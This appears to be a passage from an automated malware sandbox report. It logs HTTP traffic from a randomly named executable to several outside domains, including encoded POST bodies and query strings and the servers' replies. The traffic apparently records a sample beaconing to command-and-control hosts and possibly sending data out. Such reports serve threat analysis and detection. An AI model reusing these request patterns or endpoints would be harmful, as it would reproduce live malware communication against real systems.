[TRUNCATED]
                                                                                                            Data Ascii: 9PZt=nQ80xGd328mxj4GdeeeHb0nN8mZtid4ey+lIKk5TrN1kG5dqRjwa+dHYp/uB/VIi03EoWyACu11S/J/ZAqbcslBWqGIBTGXztY+ALBvnTK11wlRcPaqjLqILbo2SyI7pBj+c6BQlHmmK0AiZdlPiFMYnIbBCVyUy0DvTFOKehNgKW5yOQU4EzyujCUBuwkKVjCjJrGY2KqSJfYKyZ4lRr6NpW9n8FDxTC35Paa2OzYpdou7XXLt046DcQWyFBmDTBolqHVju+kLp/ixtzNn6XVoSOu1e88RgecFT2Yn9agyHUaLLh6Hy0CZSfISP31FGRBoJpbJU/xFc4tAIg7F5l4mQ7Yy25vTCkqzqL9Mz1SUGREgoSRz4IdK2Qtf2f6cqjIahEnBPs72MkpZL0/miIFAYF44pepN+wczIBjWDPYbZbY/gY2kbUSot7ED/TlEJT2zjZrrzKO3NHS5yDXEe7rmq0v5qpa52HZe5bun6oPTw6N1inDHS8MwAOvDqOTaDwz9/HULJPuqqRZyfBdWoqg3PA9TvqlL1cKlkwrQvSZNnWLnaLb3fN+iVS6AgdqFvWXiH1Ye1VUyQs5fcc0AhQIT9001tyCJPUn4qVscz+1Ybsk6NVdA1J96Q5SHB7LegwnwLXp30oeSl2daWoBO+lgwfZOtkABbSdQ1yw56hZfueomKLdKOcb6dr4Nr888sJfQZJWCdw14k2aDxbCssg/k1oe/HDT+7LYAmkizaM8FtvIPwCs20ViHM2hvJylGVlryZb2n0F0dKN9cQkbq7nWaNqmWkcfruDeHguq+/wynF8MLhB9CJgbYVxjnIwmGuxR88fdJrHd/Jtig36Y8P3JUOS7GPj6nI0EkDfit586L6SQdAs7en+SQnGTFjLpRtJOAnSzVkbnYOJyTk7RX4vmj5dGo6k1/eHy3Fr9lNbOL/VucYHZXUIrcLx47H9HOuTZk/FE2v5ejY919zv41KBf58y5sk8pGwr7wsMLwN9SKUe4P+ [TRUNCATED]
                                                                                                            Jan 11, 2025 04:26:12.517261028 CET533INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:26:12 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.650004209.74.77.107801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:14.585371017 CET485OUTGET /4t49/?I8A=fF8h_X3X0TB&9PZt=qSUUy2RUpcHfgeDYScePJkyQ5UV89Z0x3ukWI3F+j71sN74kYD8q/afbxdu8+w0uynd4aRJgg192nr/hQaDBpn5+oFhPZEmVooqYAS7CTo53tl0ZDt39OsMeY4bL/YnlFHih9hs= HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.happyjam.life
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:26:15.146795034 CET548INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:26:15 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 389
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.65000584.32.84.32801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:20.238878965 CET759OUTPOST /vc3u/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.123hellodrive.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.123hellodrive.shop
                                                                                                            Referer: http://www.123hellodrive.shop/vc3u/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 38 68 5a 57 4e 4e 74 73 6b 78 49 74 63 6d 63 45 61 71 65 54 64 37 53 64 6f 31 31 76 53 5a 4c 6d 6d 50 4f 51 7a 33 4a 6f 6c 67 46 4f 53 6e 7a 53 7a 73 67 33 73 58 32 36 54 56 65 46 62 37 37 34 48 59 55 39 68 74 73 58 56 6c 74 57 61 43 4a 4f 48 65 63 52 4d 4b 61 2b 6f 2b 6a 6c 73 71 44 56 70 49 2f 36 55 55 52 67 55 47 58 4c 30 4e 6b 7a 79 4d 52 32 45 49 79 48 54 4b 6b 7a 6d 2b 6d 71 79 61 64 57 38 46 72 53 67 46 6b 38 79 68 44 52 68 62 45 53 4a 6a 54 6f 58 6f 32 46 59 33 5a 59 42 2f 50 72 57 36 61 58 6f 78 63 48 57 48 43 39 49 32 39 32 72 43 6e 77 59 43 47 4d 42 44 34 49
                                                                                                            Data Ascii: 9PZt=MKbu1HLFE7i58hZWNNtskxItcmcEaqeTd7Sdo11vSZLmmPOQz3JolgFOSnzSzsg3sX26TVeFb774HYU9htsXVltWaCJOHecRMKa+o+jlsqDVpI/6UURgUGXL0NkzyMR2EIyHTKkzm+mqyadW8FrSgFk8yhDRhbESJjToXo2FY3ZYB/PrW6aXoxcHWHC9I292rCnwYCGMBD4I


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.65000684.32.84.32801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:22.783435106 CET783OUTPOST /vc3u/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.123hellodrive.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.123hellodrive.shop
                                                                                                            Referer: http://www.123hellodrive.shop/vc3u/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 39 43 42 57 4d 73 74 73 78 42 49 75 51 47 63 45 50 61 65 58 64 37 75 64 6f 33 5a 2f 53 72 76 6d 6a 64 47 51 39 54 39 6f 6f 41 46 4f 48 58 7a 74 33 73 67 38 73 58 36 55 54 51 32 46 62 37 2f 34 48 5a 6b 39 68 65 30 55 54 6c 74 49 53 69 4a 4d 49 2b 63 52 4d 4b 61 2b 6f 2b 6d 34 73 72 72 56 6f 34 50 36 53 31 52 2f 5a 6d 58 4b 6a 39 6b 7a 32 4d 52 49 45 49 79 31 54 49 51 4b 6d 34 69 71 79 66 78 57 35 48 53 67 35 31 6b 79 78 52 43 68 69 4f 6f 58 50 46 4f 6e 49 71 75 67 59 31 64 6e 4e 70 53 78 4b 4a 61 30 36 68 38 46 57 46 61 50 49 57 39 63 70 43 66 77 4b 56 4b 72 4f 33 64 72 68 6d 65 43 6c 2f 63 61 63 43 4e 49 73 70 41 6d 4f 36 6d 61 4d 67 3d 3d
                                                                                                            Data Ascii: 9PZt=MKbu1HLFE7i59CBWMstsxBIuQGcEPaeXd7udo3Z/SrvmjdGQ9T9ooAFOHXzt3sg8sX6UTQ2Fb7/4HZk9he0UTltISiJMI+cRMKa+o+m4srrVo4P6S1R/ZmXKj9kz2MRIEIy1TIQKm4iqyfxW5HSg51kyxRChiOoXPFOnIqugY1dnNpSxKJa06h8FWFaPIW9cpCfwKVKrO3drhmeCl/cacCNIspAmO6maMg==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.65000784.32.84.32801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:25.335705996 CET1796OUTPOST /vc3u/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.123hellodrive.shop
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.123hellodrive.shop
                                                                                                            Referer: http://www.123hellodrive.shop/vc3u/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 4d 4b 62 75 31 48 4c 46 45 37 69 35 39 43 42 57 4d 73 74 73 78 42 49 75 51 47 63 45 50 61 65 58 64 37 75 64 6f 33 5a 2f 53 72 6e 6d 2f 34 53 51 39 79 39 6f 70 41 46 4f 62 48 7a 57 33 73 67 68 73 58 79 51 54 51 37 77 62 34 4c 34 56 72 38 39 6e 76 30 55 47 56 74 49 4e 53 4a 4a 48 65 63 49 4d 4b 4b 6c 6f 2b 32 34 73 72 72 56 6f 36 58 36 52 6b 52 2f 4b 57 58 4c 30 4e 6b 2f 79 4d 52 7a 45 49 4c 43 54 49 55 61 6d 4c 71 71 79 2b 64 57 37 55 71 67 6d 46 6b 77 34 42 43 35 69 4f 74 48 50 42 75 4e 49 72 61 61 59 31 5a 6e 49 2f 76 73 58 39 53 4f 6b 67 6b 30 4b 32 32 6c 54 53 78 69 67 43 37 65 43 44 43 45 47 45 51 41 68 79 57 70 68 4f 5a 5a 57 45 46 66 6d 4e 74 6d 44 70 7a 7a 54 53 6f 71 63 46 4a 50 48 68 39 6f 6d 44 79 43 6b 42 4f 4b 6c 34 72 34 51 38 6f 56 48 44 70 41 6d 70 67 66 77 57 54 58 2b 6f 6d 7a 46 41 69 38 4f 6c 43 75 44 63 68 44 37 2b 30 4f 57 50 71 75 54 69 2f 39 45 52 68 37 50 61 79 44 55 4a 4d 67 44 46 71 55 4b 64 32 55 54 42 57 45 2f 62 75 76 76 35 35 42 42 6b 6d 6d 2f 2f 4b 4d 79 [TRUNCATED]
                                                                                                            Data Ascii: 9PZt=MKbu1HLFE7i59CBWMstsxBIuQGcEPaeXd7udo3Z/Srnm/4SQ9y9opAFObHzW3sghsXyQTQ7wb4L4Vr89nv0UGVtINSJJHecIMKKlo+24srrVo6X6RkR/KWXL0Nk/yMRzEILCTIUamLqqy+dW7UqgmFkw4BC5iOtHPBuNIraaY1ZnI/vsX9SOkgk0K22lTSxigC7eCDCEGEQAhyWphOZZWEFfmNtmDpzzTSoqcFJPHh9omDyCkBOKl4r4Q8oVHDpAmpgfwWTX+omzFAi8OlCuDchD7+0OWPquTi/9ERh7PayDUJMgDFqUKd2UTBWE/buvv55BBkmm//KMysAI21AAcqfrtzKUBxbyFCXImwtdbfWZfGWGMNrIgfR10C+HTrIgcAYiFvPgIs9qSwXehdGK/y0Kr84uMwGiH/qOAcPwWibe5yNrRNWtzY7oLVQMKTM7mfCoC8bYQWm8Y+cdUeSFT71/ujwJJB6qav5Hip/rxq96vWE+qjRfn/urPj37U7KJit31rAkTHExLQy0DTVeF+EK5JSJdq981PBv1LgMhU1pNYVirxyu1KwqoV4hZwoEwKvbd6OekZGAcItN+UYwyMjNzHzKG4zEpxI5oKO81ZRZ71p4koXHiDahMTu641sbLGgn5Q7wjl8VIdqR78VvAuKzAoXnjb/aitXZgu1Iz49EFYWx36Ym7kG4OdoY5VcUJ9SAJEVOJS80oeuZWsRG77Yi2ntx1+Fm63+JKApMS7tCTQU3OSKirL1nwzLw92CTac2Rew7SY1weqwuqFqmaCMPiiUYxllKG8OuDPF9OTUqx4+6/LDSLJNRnWm9Dm6SzAChBC7B8XQjUFLE7ke4HoRp+ifPWpVNlth3DxIlmdZASn5FG9dPxpm5HuFeGfqzddQhrvyW2SYqUd/9hJVYhAnhyX003lTFRQfWBKe65hUJfwB9jtm72S5Dcslr/GZd7ahgn0GY42R5s8f/y3IWPmYquJy09U+2wOxglAekLlTD+V6SJ [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.65000884.32.84.32801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:27.877451897 CET490OUTGET /vc3u/?9PZt=BIzO2x/CParM8yIJPtdG01YaZAIKO+ejS6SUxHNGTKrV1frM7wJkom86Bn77y9QMlkCGGhfkfqeUHrw85/0eDGlvXn9DOOwTAZn4x9nN1KHp17H/VFEoZ1G6gs1B1eVaLYSkVN0=&I8A=fF8h_X3X0TB HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Host: www.123hellodrive.shop
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Jan 11, 2025 04:26:28.319511890 CET1236INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 11 Jan 2025 03:26:28 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 9973
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Server: hcdn
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            x-hcdn-request-id: 52da3193950aff43434ce0d7fb775364-bos-edge2
                                                                                                            Expires: Sat, 11 Jan 2025 03:26:27 GMT
                                                                                                            Cache-Control: no-cache
                                                                                                            Accept-Ranges: bytes
                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                                            Jan 11, 2025 04:26:28.319631100 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                                            Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                                            Jan 11, 2025 04:26:28.319643974 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                                                            Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                                            Jan 11, 2025 04:26:28.320205927 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                                            Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                                            Jan 11, 2025 04:26:28.320218086 CET896INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                                                            Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                                                            Jan 11, 2025 04:26:28.320230007 CET1236INData Raw: 20 75 73 69 6e 67 20 48 6f 73 74 69 6e 67 65 72 20 6e 61 6d 65 73 65 72 76 65 72 73 2e 20 54 61 6b 65 20 74 68 65 20 72 65 63 6f 6d 6d 65 6e 64 65 64 20 73 74 65 70 73 20 62 65 6c 6f 77 20 74 6f 20 63 6f 6e 74 69 6e 75 65 20 79 6f 75 72 20 6a 6f
                                                                                                            Data Ascii: using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=domain-default-img.svg></div><div class=col-xs-12><div class=section-title>What's next?</div></div><div class="clearfix c
                                                                                                            Jan 11, 2025 04:26:28.320935965 CET1236INData Raw: 65 6d 65 6e 74 20 70 61 67 65 20 6f 66 20 79 6f 75 72 20 48 6f 73 74 69 6e 67 65 72 20 61 63 63 6f 75 6e 74 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d
                                                                                                            Data Ascii: ement page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){
                                                                                                            Jan 11, 2025 04:26:28.320947886 CET1236INData Raw: 6e 67 65 45 72 72 6f 72 28 22 49 6c 6c 65 67 61 6c 20 69 6e 70 75 74 20 3e 3d 20 30 78 38 30 22 29 3b 6d 2e 70 75 73 68 28 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 29 7d 66 6f 72 28 64 3d 30 3c 63 3f 63 2b 31 3a 30 3b 64 3c 45 3b 29 7b 66 6f
                                                                                                            Data Ascii: ngeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeError("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("p
                                                                                                            Jan 11, 2025 04:26:28.320960045 CET764INData Raw: 68 3d 6c 2c 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68
                                                                                                            Data Ascii: h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.650009154.208.202.225801436C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 11, 2025 04:26:34.042489052 CET744OUTPOST /k6vm/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.zoomlive.live
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.zoomlive.live
                                                                                                            Referer: http://www.zoomlive.live/k6vm/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Raw: 39 50 5a 74 3d 4e 53 74 55 63 79 33 51 64 43 6e 41 54 72 37 59 64 62 6a 79 79 53 6a 41 67 79 78 61 6d 6b 76 51 64 57 78 44 2b 56 77 6f 50 4c 54 63 75 67 6c 50 30 7a 57 38 32 74 46 73 6a 2b 30 4a 4d 6e 7a 52 56 4c 43 62 38 6d 50 43 4c 48 69 53 7a 66 47 61 76 62 6f 64 69 56 65 79 6c 51 2f 39 41 2f 50 39 52 31 32 56 38 49 77 61 79 43 53 6e 34 39 6a 50 61 4f 30 36 4c 4f 79 53 44 49 72 59 68 6b 77 46 37 72 54 78 4f 63 4f 79 65 43 67 62 6b 2f 42 31 77 38 7a 6b 35 47 5a 44 31 35 71 74 47 4c 39 75 42 4d 36 58 41 53 4b 67 64 39 58 4a 68 4d 2b 49 64 63 73 36 41 54 47 6e 67 6e 46 6a 62 62 39 78 36 47 68 6c 4e 54 45 4c 4e 65 76 4f
